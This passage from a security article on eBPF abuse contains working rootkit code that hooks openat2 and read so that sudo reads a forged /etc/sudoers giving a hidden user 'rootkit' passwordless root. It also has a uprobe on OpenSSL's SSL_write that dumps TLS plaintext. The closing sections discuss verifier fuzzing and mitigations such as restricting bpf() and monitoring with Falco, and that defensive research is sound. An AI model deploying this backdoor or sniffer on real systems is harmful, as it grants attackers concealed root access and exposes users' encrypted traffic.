Creating a hidden user is a neat feature when it comes to hiding malicious behaviors. This can be achieved by using eBPF to hook the open and read syscalls, and then by crafting a custom entry inside the /etc/sudoers file when sudo tries to read it. The code below is just an example of how such capabilities can be achieved.
In order to do so, we created kprobes on three kernel functions: do_sys_openat2 (which serves SYS_openat2), ksys_read (SYS_read), and do_exit (SYS_exit). The logic is as follows:
1 – when SYS_openat2 is called on /etc/sudoers, we save the returned file descriptor inside a map, keyed by the calling process pid.
2 – when SYS_read is called, we check if the file descriptor is the one we saved before; if so, we save the destination buffer inside the map and overwrite its content once the read returns.
3 – when SYS_exit is called, we check if the process pid is present inside our map; if so, we remove its entry from the map, so that a later process reusing the same pid or fd number is not matched by mistake.
The final code looks like this:
#define USERNAME "rootkit"
#define NEW_SUDOERS "root ALL=(ALL:ALL) ALL\n" USERNAME " ALL=(ALL) NOPASSWD:ALL\n"
#define PAD_CHAR '\0' // can also be '#'
#define MAX_SUDOERS_SIZE 20000
#define true 1
#define false 0
#define bool int
SEC("kprobe/do_sys_openat2")
int kprobe__do_sys_openat2(struct pt_regs *ctx) {
    // second argument (rsi) of do_sys_openat2: user-space pointer to the path
    const char *filename = NULL;
    bpf_probe_read(&filename, sizeof(filename), &ctx->si);
    char name[256];
    bpf_probe_read_user_str(name, sizeof(name), filename);
    // libc's strcmp is not available in eBPF: __bpf_strncmp is the helper from
    // the file-hiding example; the length includes the trailing NUL
    if (__bpf_strncmp(name, "/etc/sudoers", sizeof("/etc/sudoers")) == 0) {
        size_t pt = bpf_get_current_pid_tgid();
        // first write fd = -1 to the map as we are currently at the start of the function
        // and we don't know the value of it yet, we also don't know the destination buffer
        // until kprobe/ksys_read, so set it to NULL for now
        struct fd_dest fdest = { .fd = -1, .dest = NULL };
        bpf_map_update_elem(&sudoers_map, &pt, &fdest, BPF_NOEXIST);
    }
    return 0;
}
SEC("kretprobe/do_sys_openat2")
int kretprobe__do_sys_openat2(struct pt_regs *ctx) {
    struct fd_dest fdest;
    size_t pt = bpf_get_current_pid_tgid();
    void *val = bpf_map_lookup_elem(&sudoers_map, &pt);
    if (val == NULL)
        return 0;
    bpf_probe_read(&fdest, sizeof(fdest), val);
    // check if we already saved the fd of /etc/sudoers to the map
    if (fdest.fd != -1)
        return 0;
    // read the rax value, which contains the fd of the opened file
    bpf_probe_read(&fdest.fd, sizeof(fdest.fd), &ctx->ax);
    // update fd from -1 to the actual fd
    bpf_map_update_elem(&sudoers_map, &pt, &fdest, BPF_EXIST);
    return 0;
}
SEC("kprobe/ksys_read")
int kprobe__ksys_read(struct pt_regs *ctx) {
    int fd;
    struct fd_dest fdest;
    size_t pt = bpf_get_current_pid_tgid();
    void *val = bpf_map_lookup_elem(&sudoers_map, &pt);
    if (val == NULL)
        return 0;
    bpf_probe_read(&fdest, sizeof(fdest), val);
    // if we still haven't hit kretprobe of do_sys_openat2
    // (the fd of /etc/sudoers is not saved yet)
    // also skip if the destination buffer was already saved
    if (fdest.fd == -1 || fdest.dest != NULL)
        return 0;
    bpf_probe_read(&fd, sizeof(fd), &ctx->di);
    // check if the read fd matches the fd of the /etc/sudoers file
    if (fd != fdest.fd)
        return 0;
    // the destination buffer pointer is within rsi register
    // read its value and write it to the map
    bpf_probe_read(&fdest.dest, sizeof(fdest.dest), &ctx->si);
    bpf_map_update_elem(&sudoers_map, &pt, &fdest, BPF_EXIST);
    return 0;
}
SEC("kretprobe/ksys_read")
int kretprobe__ksys_read(struct pt_regs *ctx) {
    long bytes_read = 0; // read() returns a negative value on error
    struct fd_dest fdest;
    size_t pt = bpf_get_current_pid_tgid();
    void *val = bpf_map_lookup_elem(&sudoers_map, &pt);
    if (val == NULL)
        return 0;
    bpf_probe_read(&fdest, sizeof(fdest), val);
    if (fdest.dest == NULL)
        return 0;
    // libc's strlen is not available in eBPF; the length of a string literal
    // is known at compile time (sizeof counts the trailing NUL)
    const size_t new_sudoers_len = sizeof(NEW_SUDOERS) - 1;
    bpf_probe_read(&bytes_read, sizeof(bytes_read), &ctx->ax);
    if (bytes_read <= 0 || (size_t)bytes_read < new_sudoers_len)
        return 0;
    // write NEW_SUDOERS to the beginning of the file
    bpf_probe_write_user(fdest.dest, NEW_SUDOERS, new_sudoers_len);
    // pad the rest of the /etc/sudoers with PAD_CHAR
    // i < MAX_SUDOERS_SIZE check is needed otherwise the verifier won't allow
    // the program to load
    char tmp = PAD_CHAR;
    for (u32 i = new_sudoers_len; i < (u32)bytes_read && i < MAX_SUDOERS_SIZE; i++)
        bpf_probe_write_user(fdest.dest + i, &tmp, sizeof(tmp));
    return 0;
}
SEC("kprobe/do_exit")
int kprobe__do_exit(struct pt_regs *ctx) {
    size_t pt = bpf_get_current_pid_tgid();
    // if the pid_tgid is found within the map then the process that's currently
    // exiting is a process that previously read /etc/sudoers, remove it from the map
    if (bpf_map_lookup_elem(&sudoers_map, &pt))
        bpf_map_delete_elem(&sudoers_map, &pt);
    return 0;
}
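To make the effect of the read hook easier to follow, here is a user-space sketch of the buffer rewrite that kretprobe__ksys_read performs on the data returned to sudo. overlay_sudoers is a hypothetical name, and '#' is used as the padding character (the alternative mentioned in the code) so that the result stays printable:

```c
#include <stddef.h>
#include <string.h>

#define NEW_SUDOERS "root ALL=(ALL:ALL) ALL\nrootkit ALL=(ALL) NOPASSWD:ALL\n"
#define PAD_CHAR '#'

/*
 * Overlay the forged entries on a buffer that read() just filled with
 * bytes_read bytes. Returns 1 if the buffer was rewritten, 0 otherwise.
 */
static int overlay_sudoers(char *buf, size_t bytes_read)
{
    const size_t new_len = sizeof(NEW_SUDOERS) - 1; /* without the NUL */

    if (bytes_read < new_len)
        return 0; /* not enough room, leave the data alone */

    memcpy(buf, NEW_SUDOERS, new_len);
    /* Blank out whatever remains of the real file content. */
    memset(buf + new_len, PAD_CHAR, bytes_read - new_len);
    return 1;
}
```

The file on disk is never touched: only the copy of the data handed back to the reading process changes, which is why file integrity monitoring does not notice it.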
The only effective way to defend against this kind of rootkit is to use eBPF to monitor the SYS_bpf syscall.
SSL plaintext dump with Uprobe
It’s not only syscalls that can be hooked, but also user-space functions. This can be done by using uprobes. Under the hood, uprobe hooking on x86 works by placing an INT3 breakpoint instruction on the target function. The address of the function has to be resolved first, so a binary that ships its symbols is much easier to hook (otherwise a raw offset must be supplied). When the breakpoint is hit, the kernel invokes the eBPF program and passes the context to it. This context contains the registers of the target process, which the eBPF program can use to read, and even write, the memory of that process, including its stack.
The example below shows how to hook the SSL_write function from OpenSSL and dump the plaintext of the SSL connection.
SEC("uprobe/SSL_write")
int uprobe__SSL_write(struct pt_regs *ctx)
{
    size_t len = (size_t)PT_REGS_PARM3(ctx);
    char *buf = (char *)PT_REGS_PARM2(ctx);

    // check if len is greater than 0
    if (len > 0 && buf != NULL)
    {
        if (len > 256)
        {
            len = 256;
        }
        bpf_printk("SSL_write RSI: %p\n", buf);
        ssl_result_t *res;
        u32 key = 0;
        res = bpf_map_lookup_elem(&ssl_results, &key);
        if (!res)
        {
            return 0;
        }
        bpf_probe_read_user_str(&res->msg, len, buf);
        bpf_get_current_comm(&res->comm, sizeof(res->comm));
        res->pid = bpf_get_current_pid_tgid() >> 32;
        bpf_perf_event_output(ctx, &ssl_events, BPF_F_CURRENT_CPU, res, sizeof(*res));
    }
    return 0;
}
SSL_write has the following signature:
int SSL_write(SSL *ssl, const void *buf, int num);
On x86-64, the RSI register holds the second argument, which is the pointer to the buffer containing the data to be sent (plaintext).
Protecting against this kind of attack is relatively simple. Since the breakpoint changes the in-memory .text segment of the process, developers could implement some kind of integrity check (e.g., CRC32) to detect that the code has been modified.
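A minimal sketch of such a self-check is shown below, assuming x86, where the breakpoint byte is 0xCC. crc32_bytes and starts_with_int3 are hypothetical names; a real check would take its reference checksum at build time or at start-up, before an attacker has a chance to attach.

```c
#include <stddef.h>
#include <stdint.h>

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320, the one used by zlib). */
static uint32_t crc32_bytes(const uint8_t *data, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;

    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* x86 only: report whether the code at `func` starts with INT3 (0xCC). */
static int starts_with_int3(const void *func)
{
    return *(const volatile uint8_t *)func == 0xCC;
}
```

Comparing crc32_bytes over the bytes of a sensitive function against the stored reference, or simply probing its first byte with starts_with_int3, would reveal a breakpoint that was inserted after the reference was taken.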
eBPF exploitation
eBPF is the perfect target for hackers. Given the complexity of the verifier, it’s very likely in the near future that some bugs will be found and exploited.
Fuzzing is still the preferred way to find bugs in the kernel, but it’s not easy to fuzz eBPF programs. The verifier is very strict and it’s not easy to generate valid programs. Some clever approaches have been developed to overcome this problem. For example, Buzzer from Google is a fuzzer that uses logs from the verifier itself to generate valid programs, and also KCOV to trace the coverage of the generated samples.
This approach resulted in the discovery of some bugs in the verifier, CVE-2023-2163 for example. There is still room for improvement, though, such as fuzzing the side effects of kernel helper functions. This could be done by improving the sample generation logic and, given the small number of instructions supported by the eBPF VM, it’s possible to implement a fuzzer that generates valid programs by using a grammar-based approach.
Porting the verifier entirely to user-space could also be a good idea. This would allow us to fuzz the verifier itself, with the help of assertions that force it to crash when one of its assumptions turns out to be invalid.
Mitigation
The most effective way to mitigate such attacks is to restrict usage of SYS_bpf to privileged users. This can be done by building the kernel with the CONFIG_BPF_UNPRIV_DEFAULT_OFF kconfig knob, which sets the default value of the kernel.unprivileged_bpf_disabled sysctl and is the default at the moment of writing.
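The current state of that setting can be checked at runtime through the kernel.unprivileged_bpf_disabled sysctl. The sketch below reads it from /proc and describes the value; describe_unpriv_bpf and read_unpriv_bpf_disabled are hypothetical names:

```c
#include <stdio.h>

/* Meaning of the kernel.unprivileged_bpf_disabled values. */
static const char *describe_unpriv_bpf(int value)
{
    switch (value) {
    case 0:
        return "unprivileged bpf() allowed";
    case 1:
        return "unprivileged bpf() disabled until reboot";
    case 2:
        return "unprivileged bpf() disabled, root may re-enable it";
    default:
        return "unknown";
    }
}

/* Returns the sysctl value, or -1 if it cannot be read. */
static int read_unpriv_bpf_disabled(void)
{
    int value = -1;
    FILE *f = fopen("/proc/sys/kernel/unprivileged_bpf_disabled", "r");

    if (!f)
        return -1;
    if (fscanf(f, "%d", &value) != 1)
        value = -1;
    fclose(f);
    return value;
}
```

A hardening script could, for instance, print describe_unpriv_bpf(read_unpriv_bpf_disabled()) and raise an alert when the value is 0.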
Another option is using monitoring tools such as Falco to monitor syscall usage and detect abuse of such.
In addition to the above methods, bpftool can be used to get insight into the loaded eBPF programs and how each of them is used (Kprobe, TC, and so on).
Conclusion
eBPF is a very powerful technology that allows us to extend the kernel functionality in a safe way. It’s used in production by many companies and it’s likely that it will be used even more in the future. But also, threat actors can take advantage of this technology to hide their malicious activities, bypass security checks, and even exploit the kernel.
The best way to deal with those kinds of next-gen attacks is to fully use the power of eBPF to monitor the kernel and detect suspicious activities.
Falco provides a great example of how eBPF can be used to detect malicious activities. Falco also supports monitoring the bpf() syscall, which allows it to detect eBPF exploitation attempts.
References:
- https://github.com/google/buzzer
- https://pentera.io/blog/the-good-bad-and-compromisable-aspects-of-linux-ebpf/
- https://stdnoerr.github.io/writeup/2022/08/21/eBPF-exploitation-(ft.-D-3CTF-d3bpf).html
- https://elixir.bootlin.com/linux/v6.4.3/source/kernel/bpf/verifier.c
- https://ebpf.io/
- https://www.collabora.com/news-and-blog/blog/2019/04/15/an-ebpf-overview-part-2-machine-and-bytecode/